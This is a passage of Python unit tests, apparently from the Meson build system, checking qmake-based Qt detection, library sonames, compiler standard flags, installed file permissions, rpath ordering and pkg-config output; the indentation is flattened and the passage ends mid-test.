def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def test_qt6dependency_qmake_detection(self):
'''
Test that qt6 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt6'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 6' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 6.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt6
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt6 \(modules: Core\) found: YES .* \((qmake|qmake-qt6)\)\n')
def glob_sofiles_without_privdir(self, g):
files = glob(g)
return [f for f in files if not f.endswith('.p')]
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '37 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '37 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir: str, compiler: 'Compiler') -> None:
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_cpp20 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=10.0.0', None) or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=10.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
key = OptionKey('std', lang=compiler.language)
for v in compiler.get_options()[key].choices:
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
elif '++20' in v and not has_cpp20:
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
self.init(testdir, extra_args=[f'-D{key!s}={v}'])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print(f'{key!s} was {v!r}')
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if compiler.language == 'c':
env_flag_name = 'CFLAGS'
elif compiler.language == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(compiler.language))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc)
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp)
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '43 subproject')
self.init(testdir, extra_args='--unity=subprojects')
pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
self.assertEqual(len(pdirs), 1)
self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
self.assertEqual(len(sdirs), 1)
self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '60 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '191 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skipIfNoPkgconfig
def test_build_rpath_pkgconfig(self):
'''
Test that current build artefacts (libs) are found first on the rpath,
manually specified rpath comes second and additional rpath elements (from
pkg-config files) come last
'''
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '90 pkgconfig build rpath order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar:/foo/dummy')
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar:/foo/dummy')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz:/foo/dummy')
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz:/foo/dummy')
def test_global_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
if is_osx():
raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
testdir = os.path.join(self.unit_test_dir, '81 global-rpath')
oldinstalldir = self.installdir
# Build and install an external library without DESTDIR.
# The external library generates a .pc file without an rpath.
yonder_dir = os.path.join(testdir, 'yonder')
yonder_prefix = os.path.join(oldinstalldir, 'yonder')
yonder_libdir = os.path.join(yonder_prefix, self.libdir)
self.prefix = yonder_prefix
self.installdir = yonder_prefix
self.init(yonder_dir)
self.build()
self.install(use_destdir=False)
# Since rpath has multiple valid formats we need to
# test that they are all properly used.
rpath_formats = [
('-Wl,-rpath=', False),
('-Wl,-rpath,', False),
('-Wl,--just-symbols=', True),
('-Wl,--just-symbols,', True),
('-Wl,-R', False),
('-Wl,-R,', False)
]
for rpath_format, exception in rpath_formats:
# Build an app that uses that installed library.
# Supply the rpath to the installed library via LDFLAGS
# (as systems like buildroot and guix are wont to do)
# and verify install preserves that rpath.
self.new_builddir()
env = {'LDFLAGS': rpath_format + yonder_libdir,
'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
if exception:
with self.assertRaises(subprocess.CalledProcessError):
self.init(testdir, override_envvars=env)
continue
self.init(testdir, override_envvars=env)
self.build()
self.install(use_destdir=False)
got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
tool_path = os.path.join(testdir, 'some_cross_tool.py')
crossfile.write(textwrap.dedent(f'''\
[binaries]
c = '{shutil.which('gcc' if is_sunos() else 'cc')}'
ar = '{shutil.which('ar')}'
strip = '{shutil.which('strip')}'
sometool.py = ['{tool_path}']
someothertool.py = '{tool_path}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
'''))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({OptionKey('pkg_config_path'): pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
